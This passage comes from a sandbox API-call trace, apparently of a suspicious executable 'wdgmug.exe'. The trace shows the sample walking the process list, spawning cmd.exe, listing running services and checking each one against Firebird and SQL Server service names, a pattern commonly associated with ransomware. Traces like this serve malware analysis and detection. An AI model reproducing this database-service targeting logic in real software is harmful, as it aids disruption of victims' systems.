lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0289.455] lstrlenW (lpString="Memory Compression") returned 18 [0289.455] Process32NextW (in: hSnapshot=0x448, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3e4, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0289.455] lstrlenW (lpString="taskhostw.exe") returned 13 [0289.455] Process32NextW (in: hSnapshot=0x448, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0289.456] lstrlenW (lpString="sihost.exe") returned 10 [0289.456] Process32NextW (in: hSnapshot=0x448, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.457] lstrlenW (lpString="svchost.exe") returned 11 [0289.457] Process32NextW (in: hSnapshot=0x448, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x938, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0289.457] lstrlenW (lpString="taskhostw.exe") returned 13 [0289.457] Process32NextW (in: hSnapshot=0x448, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0xa10, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0289.458] lstrlenW (lpString="explorer.exe") returned 12 [0289.836] Process32NextW (in: hSnapshot=0x448, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0289.836] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0289.836] Process32NextW (in: hSnapshot=0x448, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0289.837] lstrlenW (lpString="SearchUI.exe") returned 12 [0289.837] Process32NextW (in: hSnapshot=0x448, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x744, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0289.837] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0289.837] Process32NextW (in: hSnapshot=0x448, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0289.838] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0289.838] Process32NextW (in: hSnapshot=0x448, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="mobsync.exe")) returned 1 [0289.838] lstrlenW (lpString="mobsync.exe") returned 11 [0289.838] Process32NextW (in: hSnapshot=0x448, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0xa24, pcPriClassBase=8, dwFlags=0x0, szExeFile="wdgmug.exe")) returned 1 [0289.839] lstrlenW (lpString="wdgmug.exe") returned 10 [0289.839] Process32NextW (in: hSnapshot=0x448, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xdd0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0289.840] lstrlenW (lpString="cmd.exe") returned 7 [0289.840] Process32NextW (in: hSnapshot=0x448, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0289.840] lstrlenW (lpString="conhost.exe") returned 11 [0289.840] Process32NextW (in: hSnapshot=0x448, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa24, pcPriClassBase=8, dwFlags=0x0, szExeFile="wdgmug.exe")) returned 1 [0289.841] lstrlenW (lpString="wdgmug.exe") returned 10 [0289.841] Process32NextW (in: hSnapshot=0x448, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa24, pcPriClassBase=8, dwFlags=0x0, szExeFile="wdgmug.exe")) returned 0 [0289.841] CloseHandle (hObject=0x448) returned 1 [0289.841] Sleep (dwMilliseconds=0x1f4) [0290.658] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x4013db8 [0290.659] EnumServicesStatusExW (in: hSCManager=0x4013db8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 0 [0290.660] GetLastError () returned 0xea [0290.660] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1bc4) returned 0x4015d98 [0290.660] EnumServicesStatusExW (in: hSCManager=0x4013db8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x4015d98, cbBufSize=0x1bc4, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x4015d98, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 1 [0290.661] CloseServiceHandle (hSCObject=0x4013db8) returned 1 [0290.661] lstrlenW (lpString="AppXSvc") returned 7 [0290.662] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0290.662] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0290.662] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0290.662] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0290.662] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0290.662] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0290.662] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0290.662] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0290.662] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0290.662] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0290.662] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0290.662] lstrlenW (lpString="Audiosrv") returned 8 [0290.662] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0290.662] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0290.662] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0290.662] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0290.662] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0290.662] lstrlenW (lpString="BFE") returned 3 [0290.662] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0290.662] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0290.662] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0290.662] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0290.662] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0290.662] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0290.662] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0290.663] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0290.663] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0290.663] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0290.663] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0290.663] lstrlenW (lpString="CDPSvc") returned 6 [0290.663] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0290.663] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0290.663] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0290.663] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0290.663] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0290.663] lstrlenW (lpString="ClickToRunSvc") returned 13 [0290.663] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0290.663] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0290.663] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0290.663] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0290.663] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0290.663] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0290.663] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0290.663] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0290.663] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0290.663] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0290.663] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0290.663] lstrlenW (lpString="CryptSvc") returned 8 [0290.663] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0290.663] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0290.663] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0290.664] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0290.664] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0290.664] lstrlenW (lpString="DcomLaunch") returned 10 [0290.664] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0290.664] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0290.664] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0290.664] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0290.664] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0290.664] lstrlenW (lpString="DeviceAssociationService") returned 24 [0290.664] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0290.664] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0290.664] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0290.664] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0290.664] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0290.664] lstrlenW (lpString="Dhcp") returned 4 [0290.664] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0290.664] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0290.664] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0290.664] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0290.664] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0290.664] lstrlenW (lpString="Dnscache") returned 8 [0290.664] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0290.664] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0290.664] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0290.665] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0290.665] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0290.665] lstrlenW (lpString="DPS") returned 3 [0290.665] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0290.665] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0290.665] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0290.665] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0290.665] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0290.665] lstrlenW (lpString="DusmSvc") returned 7 [0290.665] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0290.665] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0290.665] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0290.665] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0290.665] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0290.665] lstrlenW (lpString="EventLog") returned 8 [0290.665] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0290.665] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0290.665] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0290.665] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0290.665] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0290.665] lstrlenW (lpString="EventSystem") returned 11 [0290.665] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0290.665] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0290.665] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0290.666] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0290.666] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0290.666] lstrlenW (lpString="FontCache") returned 9 [0290.666] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0290.666] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0290.666] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0290.666] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0290.666] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0290.666] lstrlenW (lpString="gpsvc") returned 5 [0290.666] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0290.666] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0290.666] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0290.666] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0290.666] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0290.666] lstrlenW (lpString="iphlpsvc") returned 8 [0290.666] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0290.666] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0290.666] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0290.666] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0290.666] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0290.666] lstrlenW (lpString="KeyIso") returned 6 [0290.666] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0290.666] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0290.667] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0290.667] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0290.667] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0290.667] lstrlenW (lpString="LanmanServer") returned 12 [0290.667] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0290.667] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0290.667] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0290.667] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0290.667] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0290.667] lstrlenW (lpString="LanmanWorkstation") returned 17 [0290.667] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0290.667] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0290.667] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0290.667] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0290.667] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0290.667] lstrlenW (lpString="lfsvc") returned 5 [0290.667] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0290.667] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0290.667] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0290.668] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0290.668] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0290.668] lstrlenW (lpString="lmhosts") returned 7 [0290.668] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0290.668] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0290.668] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0290.668] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0290.668] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0290.668] lstrlenW (lpString="LSM") returned 3 [0290.668] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0290.668] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0290.668] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0290.668] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0290.668] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0290.668] lstrlenW (lpString="MpsSvc") returned 6 [0290.668] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0290.668] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0290.668] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0290.668] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0290.668] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0290.668] lstrlenW (lpString="NcbService") returned 10 [0290.668] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0290.668] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0290.668] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0290.668] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0290.668] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0290.669] lstrlenW (lpString="netprofm") returned 8 [0290.669] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0290.669] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0290.669] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0290.669] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0290.669] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0290.669] lstrlenW (lpString="NgcSvc") returned 6 [0290.669] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0290.669] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0290.669] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0290.669] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0290.669] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0290.669] lstrlenW (lpString="NlaSvc") returned 6 [0290.669] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0290.669] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0290.669] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0290.669] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0290.669] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0290.669] lstrlenW (lpString="nsi") returned 3 [0290.669] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0290.669] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0290.669] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0290.669] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0290.669] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0290.669] lstrlenW (lpString="PcaSvc") returned 6 [0290.670] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0290.670] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0290.670] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0290.670] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0290.670] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0290.670] lstrlenW (lpString="PlugPlay") returned 8 [0290.670] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0290.670] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0290.670] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0290.670] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0290.670] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0290.670] lstrlenW (lpString="Power") returned 5 [0290.670] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0290.670] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0290.670] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0290.670] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0290.670] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0290.670] lstrlenW (lpString="ProfSvc") returned 7 [0290.670] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0290.670] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0290.670] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0290.670] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0290.671] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0290.671] lstrlenW (lpString="RpcEptMapper") returned 12 [0290.671] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0290.671] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0290.671] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0290.671] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0290.671] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0290.671] lstrlenW (lpString="RpcSs") returned 5 [0290.671] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0290.671] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0290.671] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0290.671] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0290.671] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0290.671] lstrlenW (lpString="SamSs") returned 5 [0290.671] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0290.671] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0290.671] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0290.671] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0290.671] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0290.671] lstrlenW (lpString="Schedule") returned 8 [0290.671] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0290.671] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0290.671] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0290.672] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0290.672] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0290.672] lstrlenW (lpString="SecurityHealthService") returned 21 [0290.672] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0290.672] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0290.672] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0290.672] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0290.672] lstrcmpiW (lpString1="sqlserveradhelper", 